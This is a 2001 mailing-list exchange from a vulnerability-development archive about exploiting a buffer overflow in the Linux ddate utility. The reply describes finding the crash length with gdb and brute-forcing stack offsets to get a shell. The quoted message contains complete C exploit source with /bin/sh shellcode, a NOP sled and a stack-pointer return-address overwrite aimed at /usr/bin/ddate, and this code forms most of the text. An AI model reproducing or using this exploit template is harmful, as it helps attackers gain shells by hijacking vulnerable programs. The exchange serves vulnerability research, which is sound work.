Vulnerability Development mailing list archives
Re: ddate buffer overflow
From: "enthh () FLASH NET" <enthh () FLASH NET>
Date: Sun, 11 Feb 2001 14:19:50 -0500
I wrote the exploit for my Slackware 7.0.0, I'm not even sure which version of ddate it is. I tried adding A's from 300 until I got a segmentation fault (at 410), and then I ran gdb.

# gdb -c core /usr/bin/ddate
(gdb) info r esp

This gave me the esp, and from there I wrote the shellcode/outline for the exploit and brute forced the esp with offsets -4000 to 4000, incrementing by 1, thus dropping me into a /bin/bash shell. I then took the ret address from the working offset and made that the default. I haven't tried it on any box other than this Slackware 7.0.0, so I'm sorry that I can't give you the specifics for your RedHat exploit.. Try doing it the long way...

----- Original Message -----
From: "s1gnal_9 " <s1gnal_9 () sunos com>
To: <enthh () FLASH NET>
Sent: 10 February, 2001 9:35 PM
Subject: Re: ddate buffer overflow
Hi, I started to write an exploit for it minutes after it was posted too, just for fun, knowing that it wasn't suid. I was wondering what distro you are running. I started to write one on a friend's RH7 box; for me, I didn't get eip and ebp of 0x41414141 until I sent 447 A's after the +. So from there on I started to make it work, but it isn't executing on the stack... I've looked over it a bit, and I don't see what I did wrong...

Here's my little version... If you see my problem, I'd really appreciate a reply... Thanks a lot.
/* I added 8 bytes to buf[] for the 8 bytes that eip and esp take up */
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>
#include <unistd.h>   /* execl */

#define OFFSETS 0

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* returns the current stack pointer (result left in %eax) */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    char buf[455];
    char buf2[456];
    int offset;

    if (argc < 2) {
        offset = OFFSETS;
    } else {
        offset = atoi(argv[1]);
    }

    /* fill with NOPs, place the shellcode near the end, then the return address */
    memset(buf, 0x90, sizeof(buf));
    memcpy(buf + sizeof(buf) - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    *(long *)&buf[455 - 4] = get_sp() - offset;

    /* argument to ddate is "+" followed by the buffer */
    strcpy(buf2, "+");
    strcat(buf2, buf);
    execl("/usr/bin/ddate", "ddate", buf2, NULL);
}